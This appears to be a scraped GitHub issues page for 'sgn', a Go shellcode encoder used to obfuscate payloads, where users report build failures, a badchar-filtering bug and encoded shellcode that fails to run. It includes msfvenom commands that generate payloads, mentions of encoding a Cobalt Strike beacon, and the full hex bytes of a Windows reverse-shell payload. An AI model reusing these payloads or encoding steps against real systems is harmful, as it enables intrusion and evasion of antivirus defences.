egebalci / sgn Goto Github PK
View Code? Open in Web Editor NEWShikata ga nai (仕方がない) encoder ported into go with several improvements
License: MIT License
Shikata ga nai (仕方がない) encoder ported into go with several improvements
License: MIT License
I get the following error when installing by the suggested method on Debian 11
❯ go install github.com/EgeBalci/sgn@latest 19:38:59
# github.com/EgeBalci/sgn
/usr/local/go/pkg/tool/linux_amd64/link: running gcc failed: exit status 1
/usr/bin/ld: cannot find -lkeystone
/usr/bin/ld: cannot find -lkeystone
collect2: error: ld returned 1 exit status
When a payload like messagebox is encoded with sgn and badchars are not specified it finishes in a second. If the badchars are specified like:
Then Ciphering payload uses the CPU on 100% and never finishes. NULL characters are quite frequently are the source of the issue of payload delivery, maybe this should be looked into.
I assume it uses a brute-force approach to generate the payload and its regenerates it if NULL byte is still part of it? Is the algorithm capable to generate NULL-byte free payload?
# sgn -badchars \\x00 -a 64 messagebox.bin
__ _ __ __ _
___ / / (_) /_____ _/ /____ _ ___ ____ _ ___ ___ _(_)
(_-</ _ \/ / '_/ _ `/ __/ _ `/ / _ `/ _ `/ / _ \/ _ `/ /
/___/_//_/_/_/\_\\_,_/\__/\_,_/ \_, /\_,_/ /_//_/\_,_/_/
========[Author:-Ege-Balcı-]====/___/=======v2.0.0=========
┻━┻ ︵ヽ(`Д´)ノ︵ ┻━┻ (ノ ゜Д゜)ノ ︵ 仕方がない
- Ciphering payload...
The shellcodes generated by SGN 2.1 dont seem to work most of the time.
Windows 10, 64bit executables. Using shellcode from mgeeky, shellcode loader runshc from https://github.com/hasherezade/masm_shc.
With SGN 2.1:
PS C:\Users\hacker\source\> C:\tools\sgn2.1\sgn.exe --arch=64 -i .\shellcodes\calc64.bin -o shellcodes\calc64.bin.sgn
__ _ __ __ _
___ / / (_) /_____ _/ /____ _ ___ ____ _ ___ ___ _(_)
(_-</ _ \/ / '_/ _ `/ __/ _ `/ / _ `/ _ `/ / _ \/ _ `/ /
/___/_//_/_/_/\_\\_,_/\__/\_,_/ \_, /\_,_/ /_//_/\_,_/_/
========[Author:-Ege-Balcı-]====/___/=======v2.0.1=========
┻━┻ ︵ヽ(`Д´)ノ︵ ┻━┻ (ノ ゜Д゜)ノ ︵ 仕方がない
[*] Input: .\shellcodes\calc64.bin
[*] Input Size: 272
[*] Outfile: shellcodes\calc64.bin.sgn
[+] Final size: 409
[+] All done \(^O^)/
PS C:\Users\hacker\source> C:\Users\hacker\Source\Repos\masm_shc\out\build\x64-Debug\runshc\runshc.exe .\shellcodes\calc64.bin.sgn
[*] Reading module from: .\shellcodes\calc64.bin.sgn
[*] Running the shellcode:
-> No Calc appears
With SGN 2.0:
PS C:\Users\hacker\source> C:\tools\sgn2.0\sgn.exe -a 64 .\shellcodes\calc64.bin
__ _ __ __ _
___ / / (_) /_____ _/ /____ _ ___ ____ _ ___ ___ _(_)
(_-</ _ \/ / '_/ _ `/ __/ _ `/ / _ `/ _ `/ / _ \/ _ `/ /
/___/_//_/_/_/\_\\_,_/\__/\_,_/ \_, /\_,_/ /_//_/\_,_/_/
========[Author:-Ege-Balcı-]====/___/=======v2.0.0=========
┻━┻ ︵ヽ(`Д´)ノ︵ ┻━┻ (ノ ゜Д゜)ノ ︵ 仕方がない
[*] Input: .\shellcodes\calc64.bin
[*] Input Size: 272
[*] Outfile: .\shellcodes\calc64.bin.sgn
[+] Final size: 352
[+] All done \(^O^)/
PS C:\Users\hacker\source> C:\Users\hacker\Source\Repos\masm_shc\out\build\x64-Debug\runshc\runshc.exe .\shellcodes\calc64.bin.sgn
[*] Reading module from: .\shellcodes\calc64.bin.sgn
[*] Running the shellcode:
-> Calc Opens
Attached is one working, one non-working shellcode.
sgn.zip
Hi,
the Go team suggests that we should use "go install github.com/example/example.git@latest" to download+compile latest package because "go get" will not support compile in the future.
This is an awesome tool, would be more awesome if there was a release package to easily download it instead of having to compile it.
Hi,
SGN doesn't seem to work with the Cobaltstrike Payload.
sgn.exe -a 64 -c 6 -plain-decoder beacon.bin
__ _ __ __ _
___ / / (_) /_____ _/ /____ _ ___ ____ _ ___ ___ _(_)
(_-</ _ \/ / '_/ _ `/ __/ _ `/ / _ `/ _ `/ / _ \/ _ `/ /
/___/_//_/_/_/\_\\_,_/\__/\_,_/ \_, /\_,_/ /_//_/\_,_/_/
========[Author:-Ege-Balcı-]====/___/=======v2.0.0=========
┻━┻ ︵ヽ(`Д´)ノ︵ ┻━┻ (ノ ゜Д゜)ノ ︵ 仕方がない
[*] Input Size: 261120
[*] Outfile: beacon.bin.sgn
[+] Final size: 261311
[+] All done \(^O^)/
Once I try to load this https://github.com/slaeryan/AQUARMOURY/blob/master/Wraith/Testing/Loader.cpp the original beacon.bin works while beacon.bin.sgn doesn't. Please check and update. I am using the version available for download in the Releases folder
Hi,
I have created a shellcode via msfvenom using the command below, this shellcode is run via a loader and it works fine:
msfvenom -p windows/x64/exec CMD="calc.exe" -a x64 -o calc.bin
I then executed below command which produced calc.bin.sgn, when i load this via my loader and other loaders it does not work:
sgn -a 64 calc.bin
am i doing something wrong here ? or is there an issue ?
hello,
i am having some issues with the project since it's generating corrupted shellcode when using multiple iterations. (eg. 10)
the command that i am using to generate the (corrupted) shellcode has a random number of iterations and it's the following:
sgn -a $BITS -c `expr $RANDOM % 10 + 1` -o /tmp/shellcode.bin $BLOB
when i set -c 1
it works, otherwise the shellcode crashes.
the shellcode that i have used for testing was generated with the following command:
msfvenom -p windows/x64/messagebox TEXT=hello TITLE=hello -f raw > messagebox.bin
The above part is the correct register selection, decryption uses three separate registers.
The following part is the wrong register selection. There is a conflict between the key register and the other two registers, resulting in an error in decryption. In this example, the key register is the 8-bit register of the data pointer register, causing the data pointer to be modified in the decryption loop.
Hi EdgeBalci,
Trying to cross-compile and build from linux and getting the error in the screenshot below;
FYI; keystone is built based on the steps listed in here
the linking path was changed to /home/med... location where keystone shared libs are located.
Any idea what might be causing this error?
Thanks.
Hi,
There is a bug in the way that badchars are identified:
Lines 101 to 105 in 9800932
the range
operator returns an iterable index, not the value at the index, and the continue
keyword breaks out of the inner range
loop, not the outer loop. So when a badchar is identified (which will just be a number counting from 0 to however many badchars were in the parameter, not the actual badchar), the program drops out and into the 'write file, everything is good' part, even though it still has badchars.
When I fixed this, it took an extremely long time to brute force a single badchar (null) on a reasonably large shellcode blob. I suspect that removing/altering badchars may need to be a separate deliberate encoding step, rather than hoping that sgn just happens to not have the character in the output.
any tips?
$ go install github.com/EgeBalci/sgn@latest
go: downloading github.com/EgeBalci/sgn v0.0.0-20221110152022-2dfae644524b
go: downloading github.com/briandowns/spinner v1.11.1
go: downloading github.com/fatih/color v1.10.0
go: downloading github.com/EgeBalci/keystone-go v0.0.0-20200525180613-e6c7cd32ceae
go: downloading github.com/olekukonko/tablewriter v0.0.4
go: downloading github.com/mattn/go-colorable v0.1.8
go: downloading github.com/mattn/go-isatty v0.0.12
go: downloading github.com/mattn/go-runewidth v0.0.7
go: downloading golang.org/x/sys v0.0.0-20200223170610-d5e6a3e2c0ae
# github.com/EgeBalci/sgn
/usr/bin/ld: cannot find -lkeystone: No such file or directory
/usr/bin/ld: cannot find -lkeystone: No such file or directory
/usr/bin/ld: cannot find -lkeystone: No such file or directory
/usr/bin/ld: cannot find -lkeystone: No such file or directory
collect2: error: ld returned 1 exit status
Hi there! my shellcode is windows/x64/shell_reverse_tcp
with LHOST=127.0.0.1 and LPORT=6677 as below:
\xfc\x48\x83\xe4\xf0\xe8\xc0\x00\x00\x00\x41\x51\x41\x50\x52\x51\x56\x48\x31\xd2\x65\x48\x8b\x52\x60\x48\x8b\x52\x18\x48\x8b\x52\x20\x48\x8b\x72\x50\x48\x0f\xb7\x4a\x4a\x4d\x31\xc9\x48\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\x41\xc1\xc9\x0d\x41\x01\xc1\xe2\xed\x52\x41\x51\x48\x8b\x52\x20\x8b\x42\x3c\x48\x01\xd0\x8b\x80\x88\x00\x00\x00\x48\x85\xc0\x74\x67\x48\x01\xd0\x50\x8b\x48\x18\x44\x8b\x40\x20\x49\x01\xd0\xe3\x56\x48\xff\xc9\x41\x8b\x34\x88\x48\x01\xd6\x4d\x31\xc9\x48\x31\xc0\xac\x41\xc1\xc9\x0d\x41\x01\xc1\x38\xe0\x75\xf1\x4c\x03\x4c\x24\x08\x45\x39\xd1\x75\xd8\x58\x44\x8b\x40\x24\x49\x01\xd0\x66\x41\x8b\x0c\x48\x44\x8b\x40\x1c\x49\x01\xd0\x41\x8b\x04\x88\x48\x01\xd0\x41\x58\x41\x58\x5e\x59\x5a\x41\x58\x41\x59\x41\x5a\x48\x83\xec\x20\x41\x52\xff\xe0\x58\x41\x59\x5a\x48\x8b\x12\xe9\x57\xff\xff\xff\x5d\x49\xbe\x77\x73\x32\x5f\x33\x32\x00\x00\x41\x56\x49\x89\xe6\x48\x81\xec\xa0\x01\x00\x00\x49\x89\xe5\x49\xbc\x02\x00\x1a\x15\x7f\x00\x00\x01\x41\x54\x49\x89\xe4\x4c\x89\xf1\x41\xba\x4c\x77\x26\x07\xff\xd5\x4c\x89\xea\x68\x01\x01\x00\x00\x59\x41\xba\x29\x80\x6b\x00\xff\xd5\x50\x50\x4d\x31\xc9\x4d\x31\xc0\x48\xff\xc0\x48\x89\xc2\x48\xff\xc0\x48\x89\xc1\x41\xba\xea\x0f\xdf\xe0\xff\xd5\x48\x89\xc7\x6a\x10\x41\x58\x4c\x89\xe2\x48\x89\xf9\x41\xba\x99\xa5\x74\x61\xff\xd5\x48\x81\xc4\x40\x02\x00\x00\x49\xb8\x63\x6d\x64\x00\x00\x00\x00\x00\x41\x50\x41\x50\x48\x89\xe2\x57\x57\x57\x4d\x31\xc0\x6a\x0d\x59\x41\x50\xe2\xfc\x66\xc7\x44\x24\x54\x01\x01\x48\x8d\x44\x24\x18\xc6\x00\x68\x48\x89\xe6\x56\x50\x41\x50\x41\x50\x41\x50\x49\xff\xc0\x41\x50\x49\xff\xc8\x4d\x89\xc1\x4c\x89\xc1\x41\xba\x79\xcc\x3f\x86\xff\xd5\x48\x31\xd2\x48\xff\xca\x8b\x0e\x41\xba\x08\x87\x1d\x60\xff\xd5\xbb\xe0\x1d\x2a\x0a\x41\xba\xa6\x95\xbd\x9d\xff\xd5\x48\x83\xc4\x28\x3c\x06\x7c\x0a\x80\xfb\xe0\x75\x05\xbb\x47\x13\x72\x6f\x6a\x00\x59\x41\x89\xda\xff\xd5
and I call sgn with following command:
sgn -a 64 -safe -plain-decoder -c 1 payload.bin
I use shcode2exe to produce executable but it is not working!
when I use my normal msfvenom shellcode as posted above, the result exe works fine.
OS: Windows 10
SGN: binary
Cheers!
I replace all cgo(github.com/EgeBalci/keystone-go) to github.com/AlexAltea/keystone.js. Then it is compiled to wasm.
repo: https://github.com/akkuman/sgn
demo project: https://github.com/akkuman/sgn-html
live demo: http://akkuman.github.io/sgn-html/
A declarative, efficient, and flexible JavaScript library for building user interfaces.
🖖 Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.
TypeScript is a superset of JavaScript that compiles to clean JavaScript output.
An Open Source Machine Learning Framework for Everyone
The Web framework for perfectionists with deadlines.
A PHP framework for web artisans
Bring data to life with SVG, Canvas and HTML. 📊📈🎉
JavaScript (JS) is a lightweight interpreted programming language with first-class functions.
Some thing interesting about web. New door for the world.
A server is a program made to process requests and deliver data to clients.
Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.
Some thing interesting about visualization, use data art
Some thing interesting about game, make everyone happy.
We are working to build community through open source technology. NB: members must have two-factor auth.
Open source projects and samples from Microsoft.
Google ❤️ Open Source for everyone.
Alibaba Open Source for everyone
Data-Driven Documents codes.
China tencent open source team.